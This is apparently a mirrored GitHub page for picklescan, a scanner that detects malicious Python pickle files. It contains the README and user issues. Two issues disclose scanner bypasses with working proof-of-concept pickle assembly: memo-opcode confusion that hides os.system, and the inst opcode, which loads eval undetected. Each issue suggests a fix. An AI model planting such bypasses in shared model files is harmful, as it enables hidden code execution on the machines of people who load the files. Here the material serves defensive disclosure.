Git Product home page Git Product logo

picklescan's Introduction

Python Pickle Malware Scanner

PyPI Test

Security scanner detecting Python Pickle files performing suspicious actions.

For more generic model scanning, Protect AI's modelscan is now available to scan not only Pickle files but also PyTorch, TensorFlow, and Keras.

Getting started

Scan a malicious model on Hugging Face:

pip install picklescan
picklescan --huggingface ykilcher/totally-harmless-model

The scanner reports that the Pickle is calling eval() to execute arbitrary code:

https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin:archive/data.pkl: global import '__builtin__ eval' FOUND
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
Dangerous globals: 1

The scanner can also load Pickles from local files, directories, URLs, and zip archives (a-la PyTorch):

picklescan --path downloads/pytorch_model.bin
picklescan --path downloads
picklescan --url https://huggingface.co/sshleifer/tiny-distilbert-base-cased-distilled-squad/resolve/main/pytorch_model.bin

To scan Numpy's .npy files, pip install the numpy package first.

The scanner exit status codes are (a-la ClamAV):

  • 0: scan did not find malware
  • 1: scan found malware
  • 2: scan failed

Develop

Create and activate the conda environment (miniconda is sufficient):

conda env create -f conda.yaml
conda activate picklescan

Install the package in editable mode to develop and test:

python3 -m pip install -e .

Edit with VS Code:

code .

Run unit tests:

pytest tests

Run manual tests:

  • Local PyTorch (zip) file
mkdir downloads
wget -O downloads/pytorch_model.bin https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin
picklescan -l DEBUG -p downloads/pytorch_model.bin
  • Remote PyTorch (zip) URL
picklescan -l DEBUG -u https://huggingface.co/prajjwal1/bert-tiny/resolve/main/pytorch_model.bin

Lint the code:

black src tests
flake8 src tests --count --show-source

Publish the package to PyPI: bump the package version in setup.cfg and create a GitHub release. This triggers the publish workflow.

Alternative manual steps to publish the package:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade build
python3 -m build
python3 -m twine upload dist/*

Test the package: bump the version of picklescan in conda.test.yaml and run

conda env remove -n picklescan-test
conda env create -f conda.test.yaml
conda activate picklescan-test
picklescan --huggingface ykilcher/totally-harmless-model

Tested on Linux 5.10.102.1-microsoft-standard-WSL2 x86_64 (WSL2).

References

picklescan's People

Contributors

dependabot[bot] avatar mcpatate avatar mebelz avatar mmaitre314 avatar quasar098 avatar seanpmorgan avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

picklescan's Issues

Possible vulnerability in picklescan==0.0.12

Hi,

Check out the following CTF challenge:
https://imaginaryctf.org/Challenges / Misc / Safe Pickle

Dockerfile states that is uses latest version of picklescan.

Challenge code:

#!/usr/bin/env python3
from picklescan.scanner import scan_pickle_bytes, SafetyLevel
import io, pickle, base64

inp = input("Base64 encoded pickle: ")
pkl = base64.b64decode(inp)
result = scan_pickle_bytes(io.BytesIO(pkl), 1337)
if (
    result.scan_err
    or result.issues_count > 0
    or not all([g.safety == SafetyLevel.Innocuous for g in result.globals])
):
    print("Dangerous pickle!")
    exit()

pickle.loads(pkl)

ValueError: at position 2, opcode b'\x03' unknown

I went and installed this with pip

and then went to run it and i get this error.
picklescan --path G:/AI_Generation/stable-diffusion-webui-master/models/Stable-diffusion/ Unhandled exception Traceback (most recent call last): File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\cli.py", line 70, in main scan_result = scan_directory_path(path) File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\scanner.py", line 410, in scan_directory_path scan_result.merge(scan_bytes(file, file_path, file_ext)) File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\scanner.py", line 350, in scan_bytes return scan_pytorch(data, file_id) File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\scanner.py", line 338, in scan_pytorch magic = get_magic_number(data) File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\site-packages\picklescan\torch.py", line 77, in get_magic_number for opcode, args, _pos in genops(data): File "C:\Users\user_name\AppData\Local\Programs\Python\Python310\lib\pickletools.py", line 2285, in _genops raise ValueError("at position %s, opcode %r unknown" % ( ValueError: at position 2, opcode b'\x03' unknown

now if I run
picklescan --huggingface ykilcher/totally-harmless-model https://huggingface.co/ykilcher/totally-harmless-model/resolve/main/pytorch_model.bin:archive/data.pkl: dangerous import '__builtin__ eval' FOUND ----------- SCAN SUMMARY ----------- Scanned files: 1 Infected files: 1 Dangerous globals: 1
as you can see it returns ok.

Add logs to cli for download

When running picklescan -u <url> I think it'd be nice to have a log or even better a progress bar of the download

Dangerous global detection bypass with memo dict confusion

Info

The picklescan tool attempts to keep track of the memo dict by parsing the
memoize opcodes whenever seen. The binput and put instructions also
insert objects into the memo but are left unhandled. While a legitimate python3
pickle should never mix *put and memoize instructions, doing so is accepted
by pickle.load.

Malware can potentially set up the memo using a mix of these opcodes so that
picklescan thinks memo[0] contains a safe module name like torch._utils
when it actually contains a dangerous one. Used in conjunction with binget
and stack_global instructions and any arbitrary python import can be made to look
safe to picklescan.

Example

The following example uses radare2 (rasm2 and r2
commands) with the r2pickledec
plugin.

This following memo.asm file is commented to explain the bypass. Comments
start with ;.

;; Dangerous strings added to memo
binstring "os"      ;; module name for os.system
binput 0            ;; memo[0] = stack[-1] = "system"
binstring "system"  ;; function name for os.system
binput 1            ;; memo[1] = stack[-1] = "system"

;; Safe strings added to memmo
binstring "torch._utils"
memoize
binstring "_rebuild_tensor_v2"
memoize

;; State of memo
;; real memmo looks like
;;; memo = {0: "os", 1: "system", 2: "torch._utils", 3: "_rebuild_tensor_v2"}
;;; picklescan's memo looks like
;;; memo = {0: "torch._utils", 1: "_rebuild_tensor_v2"}

binget 0        ;; "os" but picklescan thinks it's "torch._utils"
binget 1        ;; "system" but picklescan thinks it's "_rebuild_tensor_v2"
stack_global    ;; really: "os.system" but Picklescan thinks this is "torch._utils._rebuild_tensor_v2"
stop

The pickle can be assembled with rasm2.

$ rasm2 -a pickle -Bf memo.asm > memo.pickle

Decompiling the pickle with r2 may help with understanding.

# r2 -a pickle -qqc 'pdP' memo.pickle
## VM stack start, len 5
## VM[4]
str_x0 = "os"
## VM[3]
str_x9 = "system"
## VM[2]
str_x16 = "torch._utils"
## VM[1]
str_x28 = "_rebuild_tensor_v2"
## VM[0] TOP
return _find_class(str_x0, str_x9)

The pickle will return os.system when loaded, proving access to a
dangerous function without a detection by picklescan.

$ python3 -m pickle memo.pickle
<built-in function system>

$ picklescan -p memo.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0

Fix

A legitimate pickle that uses memoize should not use binput or put. So
the simplest fix is to mark any pickle that contains a memoize instruction
and either a binput or put instructions as dangerous.

Attempting to parse the memo without a full AST is error prone. The
r2pickledec is the only tool I am aware of that will produce a
full AST for all python pickle instructions. Running pdPj will produce the
following JSON for the above pickle.

$ r2 -a pickle -qqc 'pdPj~{}' picks/memo.pickle
{
  "stack": [
    {
      "offset": 0,
      "type": "PY_STR",
      "value": "os"
    },
    {
      "offset": 9,
      "type": "PY_STR",
      "value": "system"
    },
    {
      "offset": 22,
      "type": "PY_STR",
      "value": "torch._utils"
    },
    {
      "offset": 40,
      "type": "PY_STR",
      "value": "_rebuild_tensor_v2"
    },
    {
      "offset": 68,
      "type": "PY_GLOB",
      "value": {
        "module": {
          "offset": 0,
          "type": "PY_STR",
          "prev_seen": ".stack[0]"
        },
        "name": {
          "offset": 9,
          "type": "PY_STR",
          "prev_seen": ".stack[1]"
        }
      }
    }
  ],
  "popstack": [
  ]
}

Using r2pickledec in picklescan is possible through r2pipe but would
require adding dependencies that are not trivially installed with just pip.

I am the author of the pickle architecture in r2 and the r2pickledec
plugin. So I can offer som help if desired.

A warning on using proto for a fix

Since the offending opcodes are protocol 2 instructions, it might be tempting
to only accept them when a pickle starts with proto 2. This won't work. A
pickle can redeclare it's protocol version at will without any unpickling
error. Additionally, a pickle that has declared itself as proto 2 still has
access to protocol 4 instructions.

EICAR Test

Have the ability to create put the EICAR string in a pickle file, such that you could see what existing tools might already be scanning pickle files. From this you could potentially build in some detection and alerting with existing EDRs etc.

Pickle is file extension agnostic

I saw somewhere another list of file extensions that huggingface will scan for - but a pickle file can have an arbitrary extension. I'm not even sure you need a file extension...

_pytorch_file_extensions = {".bin", ".pt", ".pth", ".ckpt"}
_pickle_file_extensions = {".pkl", ".pickle", ".joblib", ".dat"}
_zip_file_extensions = {".zip", ".npz"}

Maybe you could scan for magic bytes for additional coverage? (Pickle files can also be mangled quite a bit - according to this bug report)

Dangerous global detection bypass with `inst` instruction

The bypass

The inst instruction is very similar to global. The only difference is that
inst automatically calls the returned global object as a function. Since the
inst instruction is not handled by picklescan, it can be used by malware to
obtain dangerous functions without detection.

Example:

The following example uses radare2 (rasm2 and r2
commands) with the r2pickledec
plugin.

The pickle stored in the test.pickle file returns the dangerous function eval. Picklescan
considers it safe because no global or stack_global instruction is ever used.

$ rasm2 -a pickle -dBf test.pickle ## disassemble the pickle
mark
short_binstring "eval"
inst "builtins eval"
stop

$ r2 -a pickle -qqc 'pdP' test.pickle   # decompile the pickle to show how it works
## VM stack start, len 1
## VM[0] TOP
g_eval_x7 = _find_class("builtins", "eval")
return g_eval_x7("eval")

$ python3 -m pickle test.pickle
<built-in function eval>

$ picklescan -p test.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0

Suggested fix

Parse the inst instruction the same way the global instruction is parsed.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.